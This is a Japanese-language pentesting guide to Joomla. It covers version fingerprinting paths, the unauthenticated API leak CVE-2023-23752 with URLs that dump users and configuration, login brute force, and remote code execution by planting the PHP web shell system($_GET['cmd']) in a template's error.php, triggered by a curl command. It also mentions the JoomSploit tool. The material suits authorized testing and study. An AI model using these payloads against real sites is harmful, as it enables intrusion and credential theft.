Joomla
Joomlaの統計
Joomlaは、Joomlaのインストールで使用されているJoomla、PHP、データベースのバージョンやサーバーのオペレーティングシステムの内訳など、いくつかの匿名の使用統計を収集します。このデータは、彼らの公開APIを介してクエリできます。
Enumeration
Discovery/Footprinting
メタを確認する
robots.txt
README.txt
バージョン
/administrator/manifests/files/joomla.xml でバージョンを確認できます。
/language/en-GB/en-GB.xml でJoomlaのバージョンを取得できます。
plugins/system/cache/cache.xml でおおよそのバージョンを確認できます。
自動
In 80,443 - Pentesting Web MethodologyはCMSスキャナーに関するセクションですで、Joomlaをスキャンできます。
API 認証なしの情報漏洩:
バージョン4.0.0から4.2.7は、認証なしの情報漏洩(CVE-2023-23752)に対して脆弱で、クレデンシャルやその他の情報をダンプします。
ユーザー:
http://<host>/api/v1/users?public=true
設定ファイル:
http://<host>/api/index.php/v1/config/application?public=true
MSFモジュール: scanner/http/joomla_api_improper_access_checks
またはrubyスクリプト: 51334
ブルートフォース
このスクリプトを使用して、ログインのブルートフォースを試みることができます。
RCE
もし管理者の資格情報を取得できたら、PHPコードのスニペットを追加することでRCEを実行できます。これをテンプレートをカスタマイズすることで行います。
Configuration
の下にある**Templates
をクリック**して、テンプレートメニューを表示します。テンプレート名をクリックします。
Template
列の下にある**protostar
を選択しましょう。これでTemplates: Customise
**ページに移動します。最後に、ページをクリックしてページソースを表示できます。
error.php
ページを選びましょう。以下のようにコード実行を得るためのPHPワンライナーを追加します:system($_GET['cmd']);
保存して閉じる
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
From XSS to RCE
JoomSploit: Joomlaの脆弱性を利用するスクリプトで、XSSをRCEまたはその他の重大な脆弱性に昇格させます。詳細はこの投稿を確認してください。Joomlaバージョン5.X.X、4.X.X、3.X.Xをサポートし、以下を可能にします:
特権昇格: Joomlaにユーザーを作成します。
(RCE) ビルトインテンプレートの編集: Joomlaのビルトインテンプレートを編集します。
(カスタム) カスタムエクスプロイト: サードパーティのJoomlaプラグイン用のカスタムエクスプロイト。
Last updated